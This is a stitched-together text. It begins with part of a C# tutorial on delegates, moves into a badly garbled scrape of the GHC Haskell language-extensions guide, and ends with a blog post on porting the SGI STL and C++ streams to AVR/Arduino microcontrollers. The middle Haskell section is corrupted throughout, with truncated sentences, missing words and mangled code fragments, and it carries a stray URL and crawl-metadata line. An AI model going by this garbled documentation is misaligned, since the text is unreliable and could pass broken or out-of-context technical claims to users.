            Console.WriteLine("Sum is {0}.", x + y);
        }

        static void Subtract(int x, int y)
        {
            Console.WriteLine("Difference is {0}.", x - y);
        }

        static void Main()
        {
            ArithmeticDelegate Operation;
            int num1, num2;

            Console.Write("Enter first number: ");
            num1 = Convert.ToInt32(Console.ReadLine());
            Console.Write("Enter second number: ");
            num2 = Convert.ToInt32(Console.ReadLine());

            if (num1 < num2)
            {
                Operation = new ArithmeticDelegate(Add);
            }
            else
            {
                Operation = new ArithmeticDelegate(Subtract);
            }

            Operation(num1, num2);
        }
    }
}
Figure 1

Enter first number: 3
Enter second number: 5
Sum is 8.
Enter first number: 5
Enter second number: 3
Difference is 2.
The first member of the class is the declaration of our delegate. We use the delegate keyword to indicate that it is a delegate. Following that is the return type of the methods it will accept. The naming practice for a delegate is the same as for a method: we use Pascal casing. We also append the word “Delegate” for better recognition. We then define the parameters of the delegate, which must match the parameters of the methods it will hold. The delegate declared here can only accept references to methods that have a void return type (no return value) and two int parameters.
After defining the delegate, we define two methods with exactly the same signature as the delegate, because they are the methods the delegate will use later. Neither method returns data, and both accept two int arguments. Inside the Main method, we declare a variable whose type is the delegate we defined. This variable will hold a reference to a method that matches the delegate's signature. The program asks for two values from the user. We then enter an if statement: if the first number is less than the second number, we add them; if the first number is greater than or equal to the second number, we subtract them. To assign a method to the delegate, we follow this syntax:

variable = new DelegateName(MethodName);
When assigning a delegate a reference to a method, we use the new keyword followed by the name of the delegate. Inside the parentheses, we give the name of the method the delegate will refer to. A simpler way is to just assign the name of the method directly to the delegate variable.
Operation = Add; Operation = Subtract;
Back to our if statement: when the condition is true, we assign the delegate the Add() method, and when it is false, we assign it the Subtract() method. The last line of Main executes our delegate, which holds the reference to the assigned method. Invoking the delegate also invokes the method it refers to.
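As an aside not covered above: instead of declaring ArithmeticDelegate ourselves, we could reuse the framework's built-in generic Action delegate type, which matches any void method with the given parameter types. A minimal sketch (the class name is my own):

```csharp
using System;

class ActionDemo
{
    static void Add(int x, int y) { Console.WriteLine("Sum is {0}.", x + y); }
    static void Subtract(int x, int y) { Console.WriteLine("Difference is {0}.", x - y); }

    static void Main()
    {
        // Action<int, int> plays the same role as ArithmeticDelegate,
        // with no separate delegate declaration needed.
        Action<int, int> operation = Add;
        operation(3, 5);      // prints "Sum is 8."

        operation = Subtract;
        operation(5, 3);      // prints "Difference is 2."
    }
}
```

Declaring your own delegate type is still useful when the name itself documents intent, but for simple cases Action (and its value-returning counterpart Func) saves boilerplate.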
language, GHC extensions, GHC As with all known Haskell systems, GHC implements some extensions to the language. They can all be enabled or disabled by commandline. Language options languageoption optionslanguage extensionsoptions controlling The language option primops make extensive use of unboxed types and unboxed tuples, which we briefly summarise here. Unboxed types Unboxed types (Glasgow extension). We use the convention (but it is only a convention) that primitive types, values, and operations have a # suffix (see ).. There are some restrictions on the use of primitive types: The main restriction is).#. Unboxed Tuples ... Unboxed tuples may not be nested. So this is illegal: f :: (# Int, (# Int, Int #), Bool #) -XMagicHash extension then allows you to refer to the Int# that is now in scope. The -XMagicHash also enables some new forms of literals (see ): #). View patterns manage sharing). Without view patterns, using this signature (.. n+k patterns -XNPlusKPatterns n+k pattern support is disabled by default. To enable it, you can use the -XNPlusKPatterns flag. Traditional record syntax -XNoTraditionalRecordSyntax Traditional record syntax, such as C {f = x}, is enabled by default. To disable it, you can use the -XNoTraditionalRecordSyntax flag.. Recursive binding groups. The mdo notation Secton g depends on a textually following generator g', if g' defines a variable that is used by g, or g' textually appears between g and g'', where g depends on g''. flag -XRecursiveDo, or the LANGUAGE RecursiveDo pragma. (The same flag.) Parallel List Comprehensions list comprehensionsparallel parallel list comprehens. Generalised (SQL-Like) List Comprehensions list comprehensionsgeneralised extended list comprehensions group sql",...] Monad comprehensions monad comprehensions Monad comprehensions generalise the list comprehension notation, including parallel comprehensions () and transform. Monad comprehensions support rebindable syntax ().. 
Rebindable syntax and the implicit Prelude import -XNoImplicitPrelude option:! . Postfix. Tuple sections. Record field disambiguation's.) Record wildcards: Wildcards can be mixed with other patterns, including expressions, writing,. The ".." expands to the missing in-scope record fields. Specifically the expansion of "C {..}" includes f if and only if: f is a record field of constructor C. The record field f is in scope somehow (either qualified or unqualified). In the case of expressions (but not patterns), the variable f is in scope unqualified, apart from the binding of the record selector itself.). Local Fixity Declarations. Package-qualified imports. Safe imports ). Such data types have only one value, namely bottom. Nevertheless, they can be useful when defining "phantom types". Data type contexts. = ...; I'm not sure what it should be.) Liberalised type synonyms. So, for example, this will be rejected: type Pr = (# Int, Int #) h :: Pr -> Int h x = ... because GHC does not allow unboxed tuples on the left of a function arrow. Existentially quantified data constructors. Existentials and type classes. Record Constructors) Restrictions! Declaring data types with explicit constructor signatures , can only be declared using this form. Notice that GADT-style syntax generalises existential types ().RelaxedPolyRec. A GADT can only be declared using GADT-style syntax ();: TypeableX class, whose kind suits that of the data type constructor, and then writing the data type instance by hand. With -XDeriveGeneric, you can derive instances of the class Generic, defined in GHC.Generics. You can use these to define generic functions, as described in . Pars.) Class and instances declarations Class declarations This section, and the next one, documents GHC's type-class extensions. There's lots of background in the paper Type classes: exploring the design space (Simon Peyton Jones, Mark Jones, Erik Meijer).). 
Default method0 genum is filled-in, and type-checked with the type (Generic a, GEnum (Rep a)) => [a]. We use default signatures to simplify generic programming in GHC (). Functional dependencies. Rules for functional dependencies In a class declaration, all of the class type variables must be reachable (in the sense mentioned in )'s (namely (s a)) and the element type a. Occasionally this really doesn't work, in which case you can split the class like this: class CollE s where empty :: s class CollE s => Coll s a where insert :: s -> a ->,'s.) The willingness to be overlapped or incoherent is a property of the instance declaration itself, controlled by the presence or otherwise of the -XOverlappingInstances and -XIncoherentInstances flags when that module is being defined. Specifically, during the lookup process: If the constraint being looked up matches two instance declarations IA and IB, and IB is a substitution instance of IA (but not vice versa); that is, IB is strictly more specific than IA either IA or IB was compiled with -XOverlappingInstances then the less-specific instance IA is ignored.. The -XIncoherentInstances flag implies the -XOverlappingInstances flag, but not vice versa. Type signatures in instance declarations The type signature in the instance declaration must be precisely the same as the one in the class declaration, instantiated with the instance type. (), the forall b scopes over the definition of foo, and in particular over the type signature for xs. Overloaded string literals.. Data :: * -> * Data type -- WRONG: These two equations together... foo B = 2 -- ...will produce a type error. are - in contrast to GADTs - are open; i.e., new instances can always be added, possibly in other modules. Supporting pattern matching across different data instances would require a form of extensible case construct.) 
Overlap of data instances The instance declarations of a data family used in a single program may not overlap at all, independent of whether they are associated or not. In contrast to type class instances, this is not only a matter of consistency, but one of type safety.. Type Type instance declarations Overlap of type synonym instances example to illustrate the condition under which overlap is permitted. type instance F (a, Int) = [a] type instance F (Int, b) = [b] -- overlap permitted type instance G (a, Int) = [a] type instance G (Char, a) = [a] -- ILLEGAL overlap, as [Char] /= [Int] Decidability of type synonym do not contain any type family constructors, the total number of symbols (data type constructors and type variables) in s1 .. sm is strictly smaller than in t1 .. tn, and for every type variable a, a occurs in s1 .. sm. Associated data and type families A data or type synonym family can be declared as part of a type class, thus: class GMapKey k where data GMap k :: * -> * ... class Collects ce where type Elem ce :: * ... When doing so, we. Associated instances When an associated data or type synonym family instance is declared within a type class instance, we most important point about associated family instances is that the type indexes corresponding to class parameters must be identical to the type given in the instance head; here this is the first argument of GMap, namely Either a. Although it is unusual, there *). Associated type synonym defaults It is possible for the class defining the associated type to specify a default for associated type instances. So for example, this is OK: class IsBoolMap v where type Key v type Key v = Int lookupKey :: Key v -> v -> Maybe Bool instance IsBoolMap [(Int, Bool)] where lookupKey = lookup There can also be multiple defaults for a single type, as long as they do not overlap: class C a where type F a b type F a Int = Bool type F a Bool = Int A default declaration is not permitted for an associated data type. 
Scoping of class parameters. Import and export The rules for export lists (Haskell Report Section 5.2) needs adjustment for type families: The form T(..), where T is a data family, names the family T and all the in-scope constructors (whether in scope qualified or unqualified) that are data instances of T. The form T(.., ci, .., fj, ..), where T is a data family, names T and the specified constructors ci and fields fj as usual. The constructors and field names must belong to some data instance of T, but are not required to belong to the same instance. The form C(..), where C is a class, names the class C and all its methods and associated types. The form C(.., mi, .., type Tj, ..), where C is a class, names the class C, and the specified methods mi and associated types Tj. The types need a keyword "type" to distinguish them from data constructors. Examples's, but not the data family D. That (annoyingly) means that you cannot selectively import Y selectively, thus "import Y( D(D1,D2) )", because Y does not export D. Instead you should list the exports explicitly, thus: module Y( D(..) ) where ... or module Y( module Y, D ) where ... Instances Family instances are implicitly exported, just like class instances. However, this applies only to the heads of instances, not to the data constructors an instance defines. Type families and instance declarations Type families require us to extend the rules for the form of instance heads, which are given in . ... Kind polymorphism This section describes kind polymorphism, and extension enabled by -XPolyKinds. It is described in more detail in the paper Giving Haskell a Promotion, which appeared at TLDI 2012. 
Overview of kind polymorphism Currently there is a lot of code duplication in the way Typeable is implemented (): class Typeable (t :: *) where typeOf :: t -> TypeRep class Typeable1 (t :: * -> *) where typeOf1 :: t a -> TypeRep class Typeable2 (t :: * -> * -> *) where typeOf2 :: t a b -> TypeRep Kind polymorphism (with -XPolyKinds) allows us to merge all these classes into one: data Proxy t = Proxy class Typeable t where typeOf :: Proxy t -> TypeRep instance Typeable Int where typeOf _ = TypeRep instance Typeable [] where typeOf _ = TypeRep Note that the datatype Proxy has kind forall k. k -> * (inferred by GHC), and the new Typeable class has kind forall k. k -> Constraint. Overview Generally speaking, with -XPolyKinds, GHC will infer a polymorphic kind for un-decorated whenever possible. For example: data T m a = MkT (m a) -- GHC infers kind T :: forall k. (k -> *) -> k -> * Just as in the world of terms, you can restrict polymorphism using a signature (-XPolyKinds implies -XKindSignatures): data T m (a :: *) = MkT (m a) -- GHC now infers kind T :: (* -> *) -> * -> * There is no "forall" for kind variables. Instead, you can simply mention a kind variable in a kind signature, thus: data T (m :: k -> *) a = MkT (m a) -- GHC now infers kind T :: forall k. (k -> *) -> k -> * Polymorphic kind recursion and complete kind signatures kind signature for T. The way to give a complete kind signature for a data type is to use a GADT-style declaration with an explicit kind signature thus: data: A GADT-style data type declaration, with an explicit "::" in the header. For example: data T1 :: (k -> *) -> k -> * where ... -- Yes T1 :: forall k. (k->*) -> k -> * data T2 (a :: k -> *) :: k -> * where ... -- Yes T2 :: forall k. (k->*) -> k -> * data T3 (a :: k -> *) (b :: k) :: * where ... -- Yes T3 :: forall k. (k->*) -> k -> * data T4 a (b :: k) :: * where ... -- YES T4 :: forall k. * -> k -> * data T5 a b where ... -- NO kind is inferred data T4 (a :: k -> *) (b :: k) where ... 
-- NO kind is inferred It makes no difference where you put the "::" but it must be there. You cannot give a complete kind signature using a Haskell-98-style data type declaration; you must use GADT syntax. A type or data family declaration always have a complete user-specified kind signature; no "::" is required: data family D1 a -- D1 :: * -> * data family D2 (a :: k) -- D2 :: forall k. k -> * data family D3 (a :: k) :: * -- D3 :: forall k. k -> * type family S1 a :: k -> * -- S1 :: forall k. * -> k -> * In a complete user-specified kind signature, any un-decorated type variable to the left of the "::" is considered to have kind "*". If you want kind polymorphism, specify a kind variable. Datatype promotion This section describes data type promotion, an extension to the kind system that complements kind polymorphism. It is enabled by -XDataKinds, and described in more detail in the paper Giving Haskell a Promotion, which appeared at TLDI 2012. Motivation Standard Haskell has a rich type language. Types classify terms and serve to avoid many common programming mistakes. The kind language, however, is relatively simple, distinguishing only lifted types (kind *), type constructors (eg. kind * -> * -> *), and unlifted types (). In particular when using advanced type system features, such as type families () or eg.. Overview With -XDataKinds, GHC automatically promotes every suitable datatype to be a kind, and its (value) constructors to be type constructors. The following types data Nat = Ze | Su Nat data List a = Nil | Cons a (List a) data Pair a b = Pair a b data Sum a b = L a | R b give rise to the following kinds and type constructors: Nat :: BOX Ze :: Nat Su :: Nat -> Nat List k :: BOX Nil :: List k Cons :: k -> List k -> List k Pair k1 k2 :: BOX Pair :: k1 -> k2 -> Pair k1 k2 Sum k1 k2 :: BOX L :: k1 -> Sum k1 k2 R :: k2 -> Sum k1 k2 where BOX is the (unique) sort that classifies kinds. 
Note that List, for instance, does not get sort BOX -> BOX, because we do not further classify kinds; all kinds have sort BOX. The following restrictions apply to promotion: We only promote datatypes whose kinds are of the form * -> ... -> * -> *. In particular, we do not promote higher-kinded datatypes such as data Fix f = In (f (Fix f)), or datatypes whose kinds involve promoted types such as Vec :: * -> Nat -> *. We do not promote datatypes whose constructors are kind polymorphic, involve constraints, or use existential quantification. We do not promote data family instances (). Distinguishing between types and constructors Since constructors and types share the same namespace, with promotion you can get ambiguous type names: data P -- 1 data Prom = P -- 2 type T = P -- 1 or promoted 2? In these cases, if you want to refer to the promoted constructor, you should prefix its name with a quote: type T1 = P -- 1 type T2 = 'P -- promoted 2 Note that promoted datatypes give rise to named kinds. Since these can never be ambiguous, we do not allow quotes in kind names. Just as in the case of Template Haskell (), there is no way to quote a data constructor or type constructor whose second character is a single quote. Promoted lists and tuples types) Note that this requires -XTypeOperators. Promoted Literals Numeric and string literals are promoted to the type level, giving convenient access to a large number of predefined type-level constants. Numeric literals are of kind Nat, while string literals are of kind Symbol. These kinds are defined in the module GHC.TypeLits. Here is an example") Equality constraints. The Constraint kind Normally, constraints (which appear in types to the left of the => arrow) have a very restricted syntax. They can only be: Class constraints, e.g. Show a Implicit parameter constraints, e.g. ?x::Int (with the -XImplicitParams flag) Equality constraints, e.g.
a ~ Int (with the -XTypeFamilies or -XGADTs flag) know, but the user has declared to have kind Constraint.. Other type system extensions Explicit universal quantification (forall).) => type (Here, we write the "foralls" explicitly, although the Haskell source language omits them; in Haskell 98, all the free type variables of an explicit source-language type signature are universally quantified, except for the class type variables in a class declaration. However, in GHC, you can give the foralls if you want. See )..ized sort function in terms of an explicitly parameterized sortBy function: sortBy :: (a -> a -> Bool) -> [a] -> [a] sort :: (?cmp :: a -> a -> Bool) => [a] -> [a] sort = sortBy ?cmp Implicit-parameter type constraints's call site is quite unambiguous, and fixes the type a. Implicit-parameter bindings An implicit parameter is bound using the standard let or where binding forms. For example, we define the min function by binding cmp. min :: Implicit parameters and polymorphic recursion. Implicit parameters and monomorphism. Explicitly-kinded quantification's. Arbitrary-rank polymorphism.]) -> Swizzle: data T a = MkT (Either a b) (b -> b) it's just as if you had written this: data T a = MkT (forall b. Either a b) (forall b. b ->. Type inference In general, type inference for arbitrary-rank types is undecidable.. Implicit quantification GHC supports impredicative polymorphism, enabled with -XImpredicativeTypes. This means that you can]). The technical details of this extension are described in the paper Boxy types: type inference for higher-rank types and impredicativity, which appeared at ICFP 2006. Lexically scoped type variables. ()) Declaration type signatures's. Expression type signatures). Pattern type signatures., ''thing interprets thing in a type context. These Names can be used to construct Template Haskell expressions, patterns, declarations etc. They may also be given as an argument to the reify function.. 
(Compared to the original paper, there are many differences of detail. The syntax for a declaration splice uses "$" not "splice". The type of the enclosed expression must be Q [Dec], not [Q Dec]. Pattern splices and quotations are not implemented.) Using Template Haskell. A Template Haskell Worked Example] ->. The quoted string finishes at the first occurrence of the two-character sequence "|]". Absolutely no escaping is performed. If you want to embed that character sequence in the string, you must invent your own escape convention (such as, say, using the string "|~]" instead), and make your quoter function interpret "|~]" as "|]". One way to implement this is to compose your quoter with a pre-processing pass to perform your escape conversion. See the discussion in Trac for details. proc x -> f -< x+1 We arr (\ x -> x+1) >>>Plus class includes a combinator ArrowPlus. In the translation box, first apply the following transformation: for each pattern pi that is of form !qi = ei, transform it to (xi,!qi) = ((),ei), and replace e0 by (xi `seq` e0). Then, when none of the left-hand-side patterns have a bang at the top, apply the rules in the existing box. (). The call inline f tries very hard to inline f. To make sure that f can be inlined, it is a good idea to mark the definition of f as INLINABLE, so that GHC guarantees to expose an unfolding regardless of how big it is. Moreover, by annotating f as INLINABLE, you ensure that f. Moreover, you can also SPECIALIZE an imported function provided it was given an INLINABLE pragma at its definition site (). A SPECIALIZE has the effect of generating (a) a specialised version of the function and (b) a rewrite rule (see ) that rewrites a call to the un-specialised function into a call to the specialised one. 
Moreover, given a SPECIALIZE pragma for a function f, GHC will automatically create specialisations for any type-class-overloaded functions called by f, if they are in the same module as the SPECIALIZE pragma, or if they are INLINABLE; and so on, transitively. You can add phase control () to the RULE generated by a SPECIALIZE pragma, just as you can if you write a RULE directly. For example: {-# SPECIALIZE [0] hammeredLookup :: [(Widget, value)] -> Widget -> value #-} generates a specialisation rule that only fires in Phase 0 (the final phase). If you do not specify any phase control in the SPECIALIZE pragma, the phase control is inherited from the inline pragma (if any) of the function. For example: foo :: Num a => a -> a foo = ...blah... {-# NOINLINE [0] foo #-} {-# SPECIALIZE foo :: Int -> Int #-} The NOINLINE pragma tells GHC not to inline foo until subsequently. Obsoletein fact, UNPACK has no effect without -O, for technical reasons (see tick 5252),. NOUNPACK pragma NOUNPACK The NOUNPACK pragma indicates to the compiler that it should not unpack the contents of a constructor field. Example: data T = T {-# NOUNPACK #-} !(Int,Int) Even with the flags -funbox-strict-fields and -O, the field of the constructor T is not unpacked. and -ddump-rule-rewrites also shows what the code looks like before and after the rewrite.ma.ma is a modifier to INLINE/NOINLINE because it really only makes sense to match f on the LHS of a rule if you are sure that f is not going to be inlined before the rule has a chance to fire. List fusion The RULES mechanism is used to implement fusion (deforestation) of common list functions. If a "good consumer" consumes an intermediate list constructed by a "good producer", the intermediate list should be eliminated entirely. The following are good producers: List comprehensions Enumerations of Int, Integer and Char (e.g. ['a'..'z']). Explicit lists (e.g. 
[True, False]) The cons constructor (e.g 3:4:[]) ++ map take, filter iterate, repeat zip, zipWith The following are good consumers: List comprehensions array (on its second argument) ++ (on its first argument) foldr map take, filter concat unzip, unzip2, unzip3, unzip4 zip, zipWith (but on one argument only; if both are good producers, zip will fuse with one but not the other) partition head and, or, any, all sequence_ msum So, for example, the following should generate no intermediate lists: or -ddump-rule-rewrites. unsafeCoerce# allows you to fool the type checker. Generic classes GHC used to have an implementation of generic classes as defined in the paper "Derivable type classes", Ralf Hinze and Simon Peyton Jones, Haskell Workshop, Montreal Sept 2000, pp94-105. These have been removed and replaced by the more general support for generic programming. Generic programming Using a combination of -XDeriveGeneric () and -XDefaultSignatures (),. Deriving representations The first thing we need is generic representations. The GHC.Generics module defines a couple of primitive types that are used to represent Haskell datatypes: -- | The Generic class mediates between user-defined datatypes and their internal representation as a sum-of-products: class Generic a where -- Encode the representation of a user datatype type Rep a :: * -> * -- Convert from the datatype to its representation from :: a -> (Rep a) x -- Convert from the representation to the datatype to :: (Rep a) x -> a Instances of this class can be derived by GHC with the -XDeriveGeneric (), and are necessary to be able to define generic instances automatically. 
For example, a user-defined datatype of trees data UserTree a = Node a (UserTree a) (UserTree a) | Leaf gets the following representation: instance Generic (UserTree a) where -- Representation type type Rep (UserTree a) = M1 D D1UserTree ( M1 C C1_0UserTree ( M1 S NoSelector (K1 P a) :*: M1 S NoSelector (K1 R (UserTree a)) :*: M1 S NoSelector (K1 R (UserTree a))) :+: M1 C C1_1UserTree -- Meta-information data D1UserTree data C1_0UserTree data C1_1UserTree instance Datatype D1UserTree where datatypeName _ = "UserTree" moduleName _ = "Main" instance Constructor C1_0UserTree where conName _ = "Node" instance Constructor C1_1UserTree where conName _ = "Leaf" This representation is generated automatically if a deriving Generic clause is attached to the datatype. Standalone deriving can also be used. Writing generic functions Typically this class will not be exported, as it only makes sense to have instances for the representation types. Generic defaults The only thing left to do now is to define a "front-end" class, which is exposed to the user: class Serialize a where put :: a -> [Bin] default put :: (Generic a, GSerialize (Rep a)) => a -> [Bit]. More information For more detail please refer to the HaskellWiki page or the original paper: Jose Pedro Magalhaes, Atze Dijkstra, Johan Jeuring, and Andres Loeh. A generic deriving mechanism for Haskell. Proceedings of the third ACM Haskell symposium on Haskell (Haskell'2010), pp. 37-48, ACM, 2010. Note: the current support for generic programming in GHC is preliminary. In particular, we only allow deriving instances for the Generic class. Support for deriving Generic1 (and thus enabling generic functions of kind * -> * such as fmap) will come at a later stage.. | https://gitlab.haskell.org/nineonine/ghc/-/raw/166bbab5e7923e47b77d7f48f1be22eff4492228/docs/users_guide/glasgow_exts.xml?inline=false | CC-MAIN-2021-43 | refinedweb | 3,866 | 54.83 |
The Standard Template Library (STL) for AVR with C++ streams
Yes you did read that correctly, this post will present a port of the Standard Template Library, or STL as it’s more commonly known, to the AVR microcontrollers.
Introduction
The STL has been around forever in computing terms with copyright notices appearing in the source code as far back as 1994 and is tried and trusted by C++ programmers the world over. These days most of the STL is a part of the Standard C++ library that ships with full-size C++ compilers.
Which version?
I chose the SGI STL, released in 2000. Other versions that I considered were the GNU STL that ships built in to libstdc++ with gcc. This version was too well woven into the libstdc++ build to be easily extracted.
The other version I looked at was uSTL. This one promised to eliminate the gcc bloat and so it had potential. However I found that on the AVR platform, using the example on the uSTL webpage the code generated was 70% larger than that produced by the SGI STL so I feel somewhat justified in my choice.
Installation and configuration
The STL consists only of header files with all the source code inline. Simply download the zip file from my downloads page and unzip to a folder on your hard disk.
Users of the Arduino IDE should be careful to get the correct version. If you’re on the latest Arduino 1.0 (or more recent) IDE then you’ll need to download at least version 1.1 due to recent changes in the Arduino package detailed below.
Those of you that use Eclipse or a command line environment simply need to configure their compiler to reference the avr-stl/include directory.
If you want to use the STL from within the popular Arduino IDE then all you need to do is copy all the files in the avr-stl/include directory into the hardware/tools/avr/avr/include subdirectory of the Arduino installation. For example, on my system I would copy all the header files into here: C:\Program Files (x86)\arduino-1.0.1\hardware\tools\avr\avr\include.
Configuration
Configuration is optional. You only need to change the defaults if you want to influence the STL memory management strategy.
All configuration options may be found in avr_config.h. Here’s what the default looks like.
namespace avrstl {

  // default alloc-ahead for vectors. quoting from the SGI docs:
  //
  // "It is crucial that the amount of growth is proportional to the current capacity(),
  // rather than a fixed constant: in the former case inserting a series of elements
  // into a vector is a linear time operation, and in the latter case it is quadratic."
  //
  // If this advice pertains to you, then uncomment the first line and comment out the second.
  // The default here in avr-land is to assume that memory is scarce.

  // template<typename T> size_t AvrVectorAllocAhead(size_t oldSize_) { return 2*oldSize_; }
  template<typename T> size_t AvrVectorAllocAhead(size_t oldSize_) { return 20+oldSize_; }
  // template<> size_t AvrVectorAllocAhead<char>(size_t oldSize_) { return 20+oldSize_; } // sample specialization for char

  // minimum buffer size allocated ahead by a deque
  inline size_t AvrDequeBufferSize() { return 20; }

  // alloc-ahead additional memory increment for strings. The default SGI implementation will add
  // the old size, doubling memory each time. We don't have memory to burn, so add 20 types each time
  template<typename T> size_t AvrStringAllocAheadIncrement(size_t oldSize_) { return 20; }
}
The first section shows how you can influence how many places a vector allocates-ahead so that it has storage in the bank ready for future allocation requests. The default allocates 20 places ahead. I have shown some commented out examples of how to change this strategy both for all vectors and just for vectors that contain a particular type (char in this example).
The second and third sections show how you can control the allocate-ahead strategy for deque’s and strings. Like vectors the default is to be conservative with memory use.
Stream support
The SGI STL is quite pure in that it does not attempt to supply a streams implementation itself, instead relying on its presence in the environment. avr-libc does not provide streams, so I have provided it via a port of the streams part of the uClibc++ project. Specifically, you get:
- ostream, istream, iostream base classes
- The istringstream and ostringstream string streams
- Stream iterators
Plus some bonuses if you’re a user of the Arduino platform:
- ohserialstream, ihserialstream, iohserialstream for reading and writing from and to the hardware serial ports on the Arduino. These streams wrap an instance of the HardwareSerial class.
- olcdstream for writing to an LCD character display (wraps an instance of LiquidCrystal).
Memory considerations
No discussion of a microcontroller STL port is complete without taking into account memory considerations. Firstly, flash memory. Your flash usage is going to depend on the templates that you use because templates take up no space until they are declared.
If all you need are the most popular templates such as string and vector then even a 16K microcontroller may be enough. If you really go to town on the containers then even a 32K controller is going to start feeling tight. Heavy users would be wise to choose an ATmega1280 (Arduino mega).
Secondly, SRAM. Again, this depends on your usage. I have made modifications (that you can customise) to ensure that the growth policy of the popular vector and string classes is suitable for 2K controllers. The complex containers such as map and set use a memory-hungry backing tree to implement their structure. You would be wise to step up to an ATmega1280 if you want to use these with lots of objects.
I have verified that all the containers are neutral in their use of dynamic memory. That is, if you declare a container, use it as much as you want and then let it go out of scope then your controller’s dynamic memory is returned to exactly the state in which it started. To do this I used the dynamic memory monitoring tools from this post. I encourage you to use these to monitor your own code.
Operators new and delete
The STL requires implementations of new, placement new and delete. If your program does not already define them then exactly one of your project .cpp files must do the following.
Recent versions of the Arduino IDE (definitely 1.0 and possibly as early as 0022) have made an attempt to support operators new and delete by supplying their own version of new.cpp that automatically gets included in every IDE build.

Unfortunately the authors have only done half a job in that they've forgotten to include placement new so as yet I can't entirely get rid of this kludge, but the procedure is now slightly different for Arduino 1.0 users.
Arduino 1.0
You will have downloaded avr-stl-1.1.zip and you need to do this:
#include <pnew.cpp>
Arduino 0021 and earlier
You will have downloaded avr-stl-1.0.zip and you need to do this:
#include <new.cpp>
That will ensure that the operators are defined. Failure to do this will result in the following compiler error: undefined reference to `operator new(unsigned int, void*)’.
A summary of what’s ported
Here is a summary of what you can use from the STL with some sample code. I’m not going to go crazy on the samples here as the web is awash with STL tutorials and samples.
vector
#include <vector> /* * Test std::vector */ struct TestVector { static void RunTest() { std::ohserialstream serial(Serial); std::vector<int> vec; std::vector<int>::const_iterator it; int i; vec.reserve(50); for(i=0;i<50;i++) vec.push_back(i); for(it=vec.begin();it!=vec.end();it++) serial << *it << std::endl; } };
Dynamic memory usage for a vector is quite good as there is almost no additional overhead over and above the space required for the objects themselves. I have implemented a default allocate-ahead policy of 20 objects which you can change if you want (see later). If you have a rough idea of how many objects you are going to need then you can greatly cut down on memory resizing by calling the reserve(n) function ahead of time.
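To see the effect of reserve(), here is a small host-side sketch in standard C++ (nothing AVR-specific is assumed; the function name is mine, invented for illustration): it counts how many times push_back() has to grow the underlying buffer, with and without a reserve() call up front.

```cpp
#include <vector>
#include <cstddef>
#include <cassert>

// Count how many times push_back() triggers a reallocation while
// inserting n elements, optionally reserving capacity up front.
inline int countReallocations(int n, bool reserveFirst) {
  std::vector<int> vec;
  if (reserveFirst)
    vec.reserve(n);                          // single up-front allocation

  int reallocations = 0;
  std::size_t lastCapacity = vec.capacity();

  for (int i = 0; i < n; i++) {
    vec.push_back(i);
    if (vec.capacity() != lastCapacity) {    // buffer was grown and moved
      reallocations++;
      lastCapacity = vec.capacity();
    }
  }
  return reallocations;
}
```

With reserveFirst true the count is zero — the standard guarantees no reallocation until size() exceeds the reserved capacity — which is exactly the saving that matters on a 2K-SRAM part.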
Note that I have also ported the template specialisation of vector for bool, i.e. std::vector<bool>. This is implemented as an array of single bits that is highly efficient in its memory usage.
string
#include <string> /* * Test std::vector */ struct TestString { static void RunTest() { std::ohserialstream serial(Serial); std::string str; char c; for(c='A';c<='Z';c++) str+=c; serial << str << std::endl; } };
std::basic_string and its wildly popular typedef std::string are both there in full. The default allocate-ahead policy is for 20 objects but you can customize that for your needs.
bitset
#include <bitset> /* * Test std::bitset */ struct TestBitset { static void RunTest() { std::ohserialstream serial(Serial); std::bitset<64> mybits(0); // set bits 63 and 31 using // different methods mybits[63]=1; mybits|=0x80000000; serial << mybits; } };
std::bitset offers a fixed size set of bits that you can operate on using familar logical operators. This class is very efficient with memory.
deque, stack, queue, priority_queue
deque, stack and queue are all ported. deque is much like a vector but has a higher SRAM overhead and for that reason I prefer vector instead. stack and queue can be declared to use vector internally instead of the default deque, and the example below shows that.
#include <stack> #include <vector> /* * Test std::stack */ struct TestStack { static void RunTest() { std::ohserialstream serial(Serial); std::stack<int,std::vector<int> > stk; int i; for(i=0;i<20;i++) stk.push(i); while(!stk.empty()) { serial << stk.top() << ' '; stk.pop(); } serial << std::endl; } };
list
#include <list> /* * Test std::list */ struct TestList { static void RunTest() { std::ohserialstream serial(Serial); std::list<int> lst; std::list<int>::const_iterator it; int i; for(i=0;i<50;i++) lst.push_back(i); for(it=lst.begin();it!=lst.end();it++) serial << *it << ' '; serial << std::endl; } };
std::list is ported and may be used as expected. The chief advantage of a list over a vector is that modifications made away from the end of the data structure are faster. Memory usage is considerably higher for a list than a vector because of the overhead of maintaining the link structures so I recommend using a vector if you have the choice, despite the fact that a vector performs allocate-ahead and a list does not.
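The "fast edits away from the end" point can be sketched in standard C++ (written against a modern host compiler for testability; the behaviour of the ported container is the same): inserting in the middle of a list is a constant-time node splice, and iterators to existing elements stay valid across the insertion.

```cpp
#include <list>

// Sketch: mid-list insertion is an O(1) pointer splice and does not
// invalidate iterators pointing at other nodes.
inline bool listMidInsertKeepsIterators() {
  std::list<int> lst = {1, 2, 4, 5};

  std::list<int>::iterator it = lst.begin();
  ++it; ++it;                         // now points at the 4
  std::list<int>::iterator at4 = it;  // remember that node

  lst.insert(it, 3);                  // relink nodes only; no elements move

  // 'at4' still refers to the same node after the insertion.
  return *at4 == 4 && lst.size() == 5;
}
```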
The std::slist (single linked list) SGI extension to the standard is also ported. You can use it if you like but I have found no advantage over the standard std::list.
set, multiset, hash_set, hash_multiset
Here come the heavyweights. set and multiset are standard containers, the hashed equivalents are SGI extensions that don't maintain sorted order within the backing tree.
These containers are not too bad on flash consumption but they do have an impact on SRAM. Consider whether you really need them, and if you do then monitor your memory consumption and make your choice of AVR device appropriately.
#include <set> /* * Test std::set */ struct TestSet { static void RunTest() { std::ohserialstream serial(Serial); std::set<int> s1,s2; int i; for(i=0;i<10;i++) s1.insert(i); for(i=5;i<15;i++) s2.insert(i); std::set_intersection( s1.begin(),s1.end(), s2.begin(),s2.end(), std::ostream_iterator<int>(serial," ")); serial << std::endl; } };
map, multimap, hash_map, hash_multimap
More heavyweights. Behind the scenes these containers use exactly the same tree structure as the set and for that reason the same cautions regarding SRAM usage apply. map and multimap are standard, the hash equivalents are SGI extensions and may be useful if you don't need to maintain sorted order.
#include <map> /* * Test std::map */ struct TestMap { static void RunTest() { std::ohserialstream serial(Serial); std::map<int,const char *> days; int i; days[1]="Monday"; days[2]="Tuesday"; days[3]="Wednesday"; days[4]="Thursday"; days[5]="Friday"; days[6]="Saturday"; days[7]="Sunday"; for(i=1;i<7;i++) serial << days[i] << std::endl; } };
Algorithms
